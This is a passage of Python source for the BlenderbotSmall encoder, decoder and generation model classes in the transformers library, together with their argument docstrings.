Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of shape
`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of shape
`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the cross-attention
blocks) that can be used (see `past_key_values` input) to speed up sequential decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
`decoder_input_ids` of shape `(batch_size, sequence_length)`. inputs_embeds (`torch.FloatTensor` of shape
`(batch_size, sequence_length, hidden_size)`, *optional*): Optionally, instead of passing `input_ids` you
can choose to directly pass an embedded representation. This is useful if you want more control over how to
convert `input_ids` indices into associated vectors than the model's internal embedding lookup matrix.
decoder_inputs_embeds (`torch.FloatTensor` of shape `(batch_size, target_sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `decoder_input_ids` you can choose to directly pass an embedded
representation. If `past_key_values` is used, optionally only the last `decoder_inputs_embeds` have to be
input (see `past_key_values`). This is useful if you want more control over how to convert
`decoder_input_ids` indices into associated vectors than the model's internal embedding lookup matrix.
If `decoder_input_ids` and `decoder_inputs_embeds` are both unset, `decoder_inputs_embeds` takes the value
of `inputs_embeds`.
use_cache (`bool`, *optional*):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
`past_key_values`).
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
class BlenderbotSmallEncoder(BlenderbotSmallPreTrainedModel):
"""
Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a
[`BlenderbotSmallEncoderLayer`].
Args:
config: BlenderbotSmallConfig
embed_tokens (nn.Embedding): output embedding
"""
def __init__(self, config: BlenderbotSmallConfig, embed_tokens: Optional[nn.Embedding] = None):
super().__init__(config)
self.dropout = config.dropout
self.layerdrop = config.encoder_layerdrop
embed_dim = config.d_model
self.padding_idx = config.pad_token_id
self.max_source_positions = config.max_position_embeddings
self.embed_scale = math.sqrt(embed_dim) if config.scale_embedding else 1.0
if embed_tokens is not None:
self.embed_tokens = embed_tokens
else:
self.embed_tokens = nn.Embedding(config.vocab_size, embed_dim, self.padding_idx)
self.embed_positions = BlenderbotSmallLearnedPositionalEmbedding(
config.max_position_embeddings,
embed_dim,
)
self.layers = nn.ModuleList([BlenderbotSmallEncoderLayer(config) for _ in range(config.encoder_layers)])
self.layernorm_embedding = nn.LayerNorm(embed_dim)
self.gradient_checkpointing = False
# Initialize weights and apply final processing
self.post_init()
def forward(
self,
input_ids=None,
attention_mask=None,
head_mask=None,
inputs_embeds=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
head_mask (`torch.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# retrieve input_ids and inputs_embeds
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
self.warn_if_padding_and_no_attention_mask(input_ids, attention_mask)
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
embed_pos = self.embed_positions(input_shape)
hidden_states = inputs_embeds + embed_pos
hidden_states = self.layernorm_embedding(hidden_states)
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
# expand attention_mask
if attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
attention_mask = _expand_mask(attention_mask, inputs_embeds.dtype)
encoder_states = () if output_hidden_states else None
all_attentions = () if output_attentions else None
# check if head_mask has a correct number of layers specified if desired
if head_mask is not None:
if head_mask.size()[0] != len(self.layers):
raise ValueError(
f"The head_mask should be specified for {len(self.layers)} layers, but it is for"
f" {head_mask.size()[0]}."
)
for idx, encoder_layer in enumerate(self.layers):
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
to_drop = False
if self.training:
dropout_probability = torch.rand([])
if dropout_probability < self.layerdrop: # skip the layer
to_drop = True
if to_drop:
layer_outputs = (None, None)
else:
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(encoder_layer),
hidden_states,
attention_mask,
(head_mask[idx] if head_mask is not None else None),
)
else:
layer_outputs = encoder_layer(
hidden_states,
attention_mask,
layer_head_mask=(head_mask[idx] if head_mask is not None else None),
output_attentions=output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None)
return BaseModelOutput(
last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions
)
class BlenderbotSmallDecoder(BlenderbotSmallPreTrainedModel):
"""
Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a [`BlenderbotSmallDecoderLayer`]
Args:
config: BlenderbotSmallConfig
embed_tokens (nn.Embedding): output embedding
"""
def __init__(self, config: BlenderbotSmallConfig, embed_tokens: Optional[nn.Embedding] = None):
super().__init__(config)
self.dropout = config.dropout
self.layerdrop = config.decoder_layerdrop
self.padding_idx = config.pad_token_id
self.max_target_positions = config.max_position_embeddings
self.embed_scale = math.sqrt(config.d_model) if config.scale_embedding else 1.0
if embed_tokens is not None:
self.embed_tokens = embed_tokens
else:
self.embed_tokens = nn.Embedding(config.vocab_size, config.d_model, self.padding_idx)
self.embed_positions = BlenderbotSmallLearnedPositionalEmbedding(
config.max_position_embeddings,
config.d_model,
)
self.layers = nn.ModuleList([BlenderbotSmallDecoderLayer(config) for _ in range(config.decoder_layers)])
self.layernorm_embedding = nn.LayerNorm(config.d_model)
self.gradient_checkpointing = False
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.embed_tokens
def set_input_embeddings(self, value):
self.embed_tokens = value
# Copied from transformers.models.bart.modeling_bart.BartDecoder._prepare_decoder_attention_mask
def _prepare_decoder_attention_mask(self, attention_mask, input_shape, inputs_embeds, past_key_values_length):
# create causal mask
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
combined_attention_mask = None
if input_shape[-1] > 1:
combined_attention_mask = _make_causal_mask(
input_shape,
inputs_embeds.dtype,
device=inputs_embeds.device,
past_key_values_length=past_key_values_length,
)
if attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
expanded_attn_mask = _expand_mask(attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]).to(
inputs_embeds.device
)
combined_attention_mask = (
expanded_attn_mask if combined_attention_mask is None else expanded_attn_mask + combined_attention_mask
)
return combined_attention_mask
def forward(
self,
input_ids=None,
attention_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
head_mask=None,
cross_attn_head_mask=None,
past_key_values=None,
inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, encoder_sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
of the decoder.
encoder_attention_mask (`torch.LongTensor` of shape `(batch_size, encoder_sequence_length)`, *optional*):
Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. Mask values
selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the cross-attention modules in the decoder to avoid performing
cross-attention on hidden heads. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`):
Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of
shape `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of
shape `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the
cross-attention blocks) that can be used (see `past_key_values` input) to speed up sequential decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those
that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of
all `decoder_input_ids` of shape `(batch_size, sequence_length)`. inputs_embeds (`torch.FloatTensor` of
shape `(batch_size, sequence_length, hidden_size)`, *optional*): Optionally, instead of passing
`input_ids` you can choose to directly pass an embedded representation. This is useful if you want more
control over how to convert `input_ids` indices into associated vectors than the model's internal
embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# retrieve input_ids and inputs_embeds
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either decoder_input_ids or decoder_inputs_embeds")
# past_key_values_length
past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
attention_mask = self._prepare_decoder_attention_mask(
attention_mask, input_shape, inputs_embeds, past_key_values_length
)
# expand encoder attention mask
if encoder_hidden_states is not None and encoder_attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
encoder_attention_mask = _expand_mask(encoder_attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1])
# embed positions
positions = self.embed_positions(input_shape, past_key_values_length)
# BlenderbotSmall applies layer norm on hidden_states
inputs_embeds = self.layernorm_embedding(inputs_embeds)
hidden_states = inputs_embeds + positions
hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
if self.gradient_checkpointing and self.training:
if use_cache:
logger.warning_once(
"`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..."
)
use_cache = False
# decoder layers
all_hidden_states = () if output_hidden_states else None
all_self_attns = () if output_attentions else None
all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None
next_decoder_cache = () if use_cache else None
# check if head_mask/cross_attn_head_mask has a correct number of layers specified if desired
for attn_mask, mask_name in zip([head_mask, cross_attn_head_mask], ["head_mask", "cross_attn_head_mask"]):
if attn_mask is not None:
if attn_mask.size()[0] != len(self.layers):
raise ValueError(
f"The `{mask_name}` should be specified for {len(self.layers)} layers, but it is for"
f" {head_mask.size()[0]}."
)
for idx, decoder_layer in enumerate(self.layers):
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
if output_hidden_states:
all_hidden_states += (hidden_states,)
if self.training:
dropout_probability = torch.rand([])
if dropout_probability < self.layerdrop:
continue
past_key_value = past_key_values[idx] if past_key_values is not None else None
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, output_attentions, use_cache)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(decoder_layer),
hidden_states,
attention_mask,
encoder_hidden_states,
encoder_attention_mask,
head_mask[idx] if head_mask is not None else None,
cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None,
None,
)
else:
layer_outputs = decoder_layer(
hidden_states,
attention_mask=attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
layer_head_mask=(head_mask[idx] if head_mask is not None else None),
cross_attn_layer_head_mask=(
cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None
),
past_key_value=past_key_value,
output_attentions=output_attentions,
use_cache=use_cache,
)
hidden_states = layer_outputs[0]
if use_cache:
next_decoder_cache += (layer_outputs[3 if output_attentions else 1],)
if output_attentions:
all_self_attns += (layer_outputs[1],)
if encoder_hidden_states is not None:
all_cross_attentions += (layer_outputs[2],)
# add hidden states from the last decoder layer
if output_hidden_states:
all_hidden_states += (hidden_states,)
next_cache = next_decoder_cache if use_cache else None
if not return_dict:
return tuple(
v
for v in [hidden_states, next_cache, all_hidden_states, all_self_attns, all_cross_attentions]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=next_cache,
hidden_states=all_hidden_states,
attentions=all_self_attns,
cross_attentions=all_cross_attentions,
)
@add_start_docstrings(
"The bare BlenderbotSmall Model outputting raw hidden-states without any specific head on top.",
BLENDERBOT_SMALL_START_DOCSTRING,
)
class BlenderbotSmallModel(BlenderbotSmallPreTrainedModel):
_tied_weights_keys = ["decoder.embed_tokens.weight", "encoder.embed_tokens.weight"]
def __init__(self, config: BlenderbotSmallConfig):
super().__init__(config)
padding_idx, vocab_size = config.pad_token_id, config.vocab_size
self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx)
self.encoder = BlenderbotSmallEncoder(config, self.shared)
self.decoder = BlenderbotSmallDecoder(config, self.shared)
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.shared
def set_input_embeddings(self, value):
self.shared = value
self.encoder.embed_tokens = self.shared
self.decoder.embed_tokens = self.shared
def get_encoder(self):
return self.encoder
def get_decoder(self):
return self.decoder
@add_start_docstrings_to_model_forward(BLENDERBOT_SMALL_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=Seq2SeqModelOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.Tensor] = None,
decoder_input_ids: Optional[torch.LongTensor] = None,
decoder_attention_mask: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.Tensor] = None,
decoder_head_mask: Optional[torch.Tensor] = None,
cross_attn_head_mask: Optional[torch.Tensor] = None,
encoder_outputs: Optional[Union[Tuple, BaseModelOutput]] = None,
past_key_values: Optional[List[torch.FloatTensor]] = None,
inputs_embeds: Optional[torch.Tensor] = None,
decoder_inputs_embeds: Optional[torch.FloatTensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple[torch.FloatTensor], Seq2SeqModelOutput]:
r"""
Returns:
Example:
```python
>>> from transformers import AutoTokenizer, BlenderbotSmallModel
>>> model = BlenderbotSmallModel.from_pretrained("facebook/blenderbot_small-90M")
>>> tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot_small-90M")
>>> inputs = tokenizer("Studies have been shown that owning a dog is good for you", return_tensors="pt")
>>> decoder_inputs = tokenizer("Studies show that", return_tensors="pt") # Batch size 1
>>> outputs = model(input_ids=inputs.input_ids, decoder_input_ids=decoder_inputs.input_ids)
>>> last_hidden_states = outputs.last_hidden_state
>>> list(last_hidden_states.shape)
[1, 3, 512]
```"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if encoder_outputs is None:
encoder_outputs = self.encoder(
input_ids=input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
# If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=True
elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):
encoder_outputs = BaseModelOutput(
last_hidden_state=encoder_outputs[0],
hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,
attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,
)
# decoder outputs consists of (dec_features, past_key_value, dec_hidden, dec_attn)
decoder_outputs = self.decoder(
input_ids=decoder_input_ids,
attention_mask=decoder_attention_mask,
encoder_hidden_states=encoder_outputs[0],
encoder_attention_mask=attention_mask,
head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if not return_dict:
return decoder_outputs + encoder_outputs
return Seq2SeqModelOutput(
last_hidden_state=decoder_outputs.last_hidden_state,
past_key_values=decoder_outputs.past_key_values,
decoder_hidden_states=decoder_outputs.hidden_states,
decoder_attentions=decoder_outputs.attentions,
cross_attentions=decoder_outputs.cross_attentions,
encoder_last_hidden_state=encoder_outputs.last_hidden_state,
encoder_hidden_states=encoder_outputs.hidden_states,
encoder_attentions=encoder_outputs.attentions,
)
@add_start_docstrings(
"The BlenderbotSmall Model with a language modeling head. Can be used for summarization.",
BLENDERBOT_SMALL_START_DOCSTRING,
)
class BlenderbotSmallForConditionalGeneration(BlenderbotSmallPreTrainedModel):
base_model_prefix = "model"
_keys_to_ignore_on_load_missing = ["final_logits_bias"]
_tied_weights_keys = ["decoder.embed_tokens.weight", "encoder.embed_tokens.weight", "lm_head.weight"]
def __init__(self, config: BlenderbotSmallConfig):
super().__init__(config)
self.model = BlenderbotSmallModel(config)
self.register_buffer("final_logits_bias", torch.zeros((1, self.model.shared.num_embeddings)))
self.lm_head = nn.Linear(config.d_model, self.model.shared.num_embeddings, bias=False)
# Initialize weights and apply final processing
self.post_init()
def get_encoder(self):
return self.model.get_encoder()
def get_decoder(self):
return self.model.get_decoder()
def resize_token_embeddings(self, new_num_tokens: int, pad_to_multiple_of: Optional[int] = None) -> nn.Embedding:
new_embeddings = super().resize_token_embeddings(new_num_tokens, pad_to_multiple_of)
self._resize_final_logits_bias(new_embeddings.weight.shape[0])
return new_embeddings
def _resize_final_logits_bias(self, new_num_tokens: int) -> None:
old_num_tokens = self.final_logits_bias.shape[-1]
if new_num_tokens <= old_num_tokens:
new_bias = self.final_logits_bias[:, :new_num_tokens]
else:
extra_bias = torch.zeros((1, new_num_tokens - old_num_tokens), device=self.final_logits_bias.device)
new_bias = torch.cat([self.final_logits_bias, extra_bias], dim=1)
self.register_buffer("final_logits_bias", new_bias)
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
@add_start_docstrings_to_model_forward(BLENDERBOT_SMALL_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=Seq2SeqLMOutput, config_class=_CONFIG_FOR_DOC)
@add_end_docstrings(BLENDERBOT_SMALL_GENERATION_EXAMPLE)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.Tensor] = None,
decoder_input_ids: Optional[torch.LongTensor] = None,
decoder_attention_mask: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.Tensor] = None,
decoder_head_mask: Optional[torch.Tensor] = None,
cross_attn_head_mask: Optional[torch.Tensor] = None,
encoder_outputs: Optional[Union[Tuple, BaseModelOutput]] = None,
past_key_values: Optional[List[torch.FloatTensor]] = None,
inputs_embeds: Optional[torch.Tensor] = None,
decoder_inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple[torch.FloatTensor], Seq2SeqLMOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the masked language modeling loss. Indices should either be in `[0, ...,
config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored
(masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`.
Returns:
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if labels is not None:
if use_cache:
logger.warning("The `use_cache` argument is changed to `False` since `labels` is provided.")
use_cache = False
if decoder_input_ids is None and decoder_inputs_embeds is None:
decoder_input_ids = shift_tokens_right(
labels, self.config.pad_token_id, self.config.decoder_start_token_id
)
outputs = self.model(
input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
encoder_outputs=encoder_outputs,
decoder_attention_mask=decoder_attention_mask,
head_mask=head_mask,
decoder_head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
decoder_inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
lm_logits = self.lm_head(outputs[0]) + self.final_logits_bias
masked_lm_loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
masked_lm_loss = loss_fct(lm_logits.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (lm_logits,) + outputs[1:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return Seq2SeqLMOutput(
loss=masked_lm_loss,
logits=lm_logits,
past_key_values=outputs.past_key_values,
decoder_hidden_states=outputs.decoder_hidden_states,
decoder_attentions=outputs.decoder_attentions,
cross_attentions=outputs.cross_attentions,
encoder_last_hidden_state=outputs.encoder_last_hidden_state,
encoder_hidden_states=outputs.encoder_hidden_states,
encoder_attentions=outputs.encoder_attentions,
)
def prepare_inputs_for_generation(
self,
decoder_input_ids,
past_key_values=None,
attention_mask=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
use_cache=None,
encoder_outputs=None,
**kwargs,
):
# cut decoder_input_ids if past is used
if past_key_values is not None:
decoder_input_ids = decoder_input_ids[:, -1:]
return {
"input_ids": None, # encoder_outputs is defined. input_ids not needed
"encoder_outputs": encoder_outputs,
"past_key_values": past_key_values,
"decoder_input_ids": decoder_input_ids,
"attention_mask": attention_mask,
"head_mask": head_mask,
"decoder_head_mask": decoder_head_mask,
"cross_attn_head_mask": cross_attn_head_mask,
"use_cache": use_cache, # change this to avoid caching (presumably for debugging)
}
@staticmethod
def _reorder_cache(past_key_values, beam_idx):
reordered_past = ()
for layer_past in past_key_values:
# cached cross_attention states don't have to be reordered -> they are always the same
reordered_past += (
tuple(past_state.index_select(0, beam_idx) for past_state in layer_past[:2]) + layer_past[2:],
)
return reordered_past
# Copied from transformers.models.bart.modeling_bart.BartDecoderWrapper with Bart->BlenderbotSmall
class BlenderbotSmallDecoderWrapper(BlenderbotSmallPreTrainedModel):
"""
This wrapper class is a helper class to correctly load pretrained checkpoints when the causal language model is
used in combination with the [`EncoderDecoderModel`] framework.
"""
def __init__(self, config):
super().__init__(config)
self.decoder = BlenderbotSmallDecoder(config)
def forward(self, *args, **kwargs):
return self.decoder(*args, **kwargs)
# Copied from transformers.models.bart.modeling_bart.BartForCausalLM with Bart->BlenderbotSmall, facebook/bart-base->facebook/blenderbot_small-90M
class BlenderbotSmallForCausalLM(BlenderbotSmallPreTrainedModel):
_tied_weights_keys = ["lm_head.weight"]
def __init__(self, config):
config = copy.deepcopy(config)
config.is_decoder = True
config.is_encoder_decoder = False
super().__init__(config)
self.model = BlenderbotSmallDecoderWrapper(config)
self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.model.decoder.embed_tokens
def set_input_embeddings(self, value):
self.model.decoder.embed_tokens = value
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def set_decoder(self, decoder):
self.model.decoder = decoder
def get_decoder(self):
return self.model.decoder
@replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: torch.LongTensor = None,
attention_mask: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.FloatTensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.Tensor] = None,
cross_attn_head_mask: Optional[torch.Tensor] = None,
past_key_values: Optional[List[torch.FloatTensor]] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, CausalLMOutputWithCrossAttentions]:
r"""
Args:
input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
if the model is configured as a decoder.
encoder_attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used
in the cross-attention if the model is configured as a decoder. Mask values selected in `[0, 1]`:
head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the cross-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`):
Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of
shape `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of
shape `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. The two additional
tensors are only required when the model is used as a decoder in a Sequence to Sequence model.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the
cross-attention blocks) that can be used (see `past_key_values` input) to speed up sequential decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those
that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of
